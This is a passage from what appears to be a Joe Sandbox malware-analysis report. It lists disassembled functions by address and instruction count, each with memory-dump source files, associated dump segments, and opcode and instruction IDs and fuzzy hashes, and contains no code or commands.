                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c5be6113664422e96713363ec41851647c31506b086c17a8b3ff98e201e465e1
                                                                                                                          • Instruction ID: 2a100c9be5b580fba548e23f4939786600c1ab3a95a996bb45fcc1ba829b43cd
                                                                                                                          • Opcode Fuzzy Hash: c5be6113664422e96713363ec41851647c31506b086c17a8b3ff98e201e465e1
                                                                                                                          • Instruction Fuzzy Hash: 09213732D082254BC3289F1DC58153BF7E4EB99704F16867EE8C4A7295E3359C1487E1
                                                                                                                          Function 00B467EF Relevance: .1, Instructions: 101COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 91596e61a3aed8d90d5335b102cb017df388da530b2bc4463aa2467795f2a4fd
                                                                                                                          • Instruction ID: 5465691b280e456f32b5c23fddac5f5186d39e386eb0d836e9d6862165bec415
                                                                                                                          • Opcode Fuzzy Hash: 91596e61a3aed8d90d5335b102cb017df388da530b2bc4463aa2467795f2a4fd
                                                                                                                          • Instruction Fuzzy Hash: AE3133705183829AE714CF14C49062FBBF0EF96784F54584DF4C8AB261D738DA85DB9A
                                                                                                                          Function 00B25E70 Relevance: .1, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d4da2f38fe3775b78375e9765eba23bd7901adbad83735308b01e608eafbf8bd
                                                                                                                          • Instruction ID: 8260231e9b8c5106f1049d7953d44dedaf542a3137d749d19c595bed64cecc1d
                                                                                                                          • Opcode Fuzzy Hash: d4da2f38fe3775b78375e9765eba23bd7901adbad83735308b01e608eafbf8bd
                                                                                                                          • Instruction Fuzzy Hash: 3B21A1705082219BC320AF18D94197BBBF4EF96765F458948F4D99B291E334CA00CBA3
                                                                                                                          Function 00B049A0 Relevance: .1, Instructions: 95COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbe2eee255ce80e2df90ed4850d7395439c2c852be5922ee4a7cea5853ec6c97
                                                                                                                          • Instruction ID: e339641ef1f4afc0210773683d99932b581f669cb23db7dee0cebe5c45460be6
                                                                                                                          • Opcode Fuzzy Hash: cbe2eee255ce80e2df90ed4850d7395439c2c852be5922ee4a7cea5853ec6c97
                                                                                                                          • Instruction Fuzzy Hash: 7A31B6B17482009FD7149F58D880A2BBBE1EF84359F1889BDE99A9B2D1D331DC52CB46
                                                                                                                          Function 00B464B8 Relevance: .1, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7d37df996ff176ad0222fa1c4173c93dfbaabc8218d2662d3608d8581bb7ee1b
                                                                                                                          • Instruction ID: 1f4a18438208dca9735442693577f972cfbfa36208f1f4513774239cec4b006b
                                                                                                                          • Opcode Fuzzy Hash: 7d37df996ff176ad0222fa1c4173c93dfbaabc8218d2662d3608d8581bb7ee1b
                                                                                                                          • Instruction Fuzzy Hash: 9E214A7060C2409BCB14EF19D490A2EFBE5FB9A746F18889CE4C593361C735AD51DB63
                                                                                                                          Function 00B45700 Relevance: .1, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08602eab5815c4b75f134674a26401470f3ba490c20fb35d7892c3fec8d15e73
                                                                                                                          • Instruction ID: 41975b3c0618506475176f3859504070e18c0b8994f2a62c83a98f2a8aa9d395
                                                                                                                          • Opcode Fuzzy Hash: 08602eab5815c4b75f134674a26401470f3ba490c20fb35d7892c3fec8d15e73
                                                                                                                          • Instruction Fuzzy Hash: D611A07191C640EBC311AF28E880A1BBBF5EF86B11F0588ACE4C49B312D735DA10DB93
                                                                                                                          Function 00B3B650 Relevance: .1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                          • Instruction ID: ad8fe1a5baa8b1e024b02f75ab4c8646eb8a77b031aebd3c76f221128d595c7c
                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                          • Instruction Fuzzy Hash: A111E533A051D80EC3168D3C8441965FFE35AE3234F6983D9F4B89B2DBD7228D8A9364
                                                                                                                          Function 00B30B80 Relevance: .1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 90022ddfb32469098a8610d4b68e70bc315f5b0e8987f5b71d64abe4c0da561b
                                                                                                                          • Instruction ID: ca295ed566d1fe69ed5ed30c25bb7b11072d67338d845559937401dbd5beff3a
                                                                                                                          • Opcode Fuzzy Hash: 90022ddfb32469098a8610d4b68e70bc315f5b0e8987f5b71d64abe4c0da561b
                                                                                                                          • Instruction Fuzzy Hash: 1A0171F5B2030247E720FF5494E1B3BF6E8AF94718F2845ACE80A57242EB75EC05C6A1
                                                                                                                          Function 00B2D1E1 Relevance: .0, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cc11ca79c23279fac8a70aeeb846db6c5146a16ab844980ca680926d86b42fbd
                                                                                                                          • Instruction ID: 167b5c2f0361a14d6c1d44823ac81af1015d231ac83655901f63c3cb86330887
                                                                                                                          • Opcode Fuzzy Hash: cc11ca79c23279fac8a70aeeb846db6c5146a16ab844980ca680926d86b42fbd
                                                                                                                          • Instruction Fuzzy Hash: 8311DDB0418380AFD3109F61C494A1FFBE5EB96714F248C4DE5A49B251C375D815DB56
                                                                                                                          Function 00B06EA0 Relevance: .0, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 752a580e2411049b70a6ee7a6fdd2f26ff0c4999c6abbc08171b35ab7ee13231
                                                                                                                          • Instruction ID: f0821a506dca1f98f2d8308217564fd8123538a8675a4a06e16e546df48c0978
                                                                                                                          • Opcode Fuzzy Hash: 752a580e2411049b70a6ee7a6fdd2f26ff0c4999c6abbc08171b35ab7ee13231
                                                                                                                          • Instruction Fuzzy Hash: B1F0B43EB1921A0BB210CDAAE8C4C3BB7D6D7DA365B145538EA41D3241DD72E8169190
                                                                                                                          Function 00B3B8C0 Relevance: .0, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dad40b8a8b0cf0c680be38028a9801f4e1e9da1297b4f3b9e1d9df466e9bee7e
                                                                                                                          • Instruction ID: 6506d07c58c905065930edc77b6421f51c28c54387ea28b09faa2761b04cb969
                                                                                                                          • Opcode Fuzzy Hash: dad40b8a8b0cf0c680be38028a9801f4e1e9da1297b4f3b9e1d9df466e9bee7e
                                                                                                                          • Instruction Fuzzy Hash: 1E0162B3A199610B8348CE3DDC1156BBAD15BD5770F19872DBEF5CB3E0D230C8118695
                                                                                                                          Function 00B1C5F0 Relevance: .0, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
                                                                                                                          • Instruction ID: afd6f86e1ed7dc578beff9a6215ab27dc393fb41cabbec3b70aacfa27007612f
                                                                                                                          • Opcode Fuzzy Hash: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
                                                                                                                          • Instruction Fuzzy Hash: EB014B72A196204B8308CE3C9C1112ABEE19B86330F158B2EBCFAD73E0D664CD548696
                                                                                                                          Function 00B1B410 Relevance: .0, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
                                                                                                                          • Instruction ID: 1cf2b4f6a86590d66af8589ee23b30719cefa5c9e930e41b9f2cf23da71344b3
                                                                                                                          • Opcode Fuzzy Hash: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
                                                                                                                          • Instruction Fuzzy Hash: CDF0ECB16045105BDF22CA549CC0FB7BBDCCB8B354F5904A6F84557303D2615885C3E5
                                                                                                                          Function 00B38220 Relevance: .0, Instructions: 32COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c3c88133bb3af9b4c7e95cd9eeb9e11d72af102676128376f4f9324308aa63d6
                                                                                                                          • Instruction ID: 0fd350e476da19683a4edae69dc1bb67fb06558d548cbb0e4675b066ca455272
                                                                                                                          • Opcode Fuzzy Hash: c3c88133bb3af9b4c7e95cd9eeb9e11d72af102676128376f4f9324308aa63d6
                                                                                                                          • Instruction Fuzzy Hash: 3301E4B44107009FC360EF29C485747BBE8EB08714F004A1DE8AECB681D770A6448B82
                                                                                                                          Function 00B41440 Relevance: .0, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
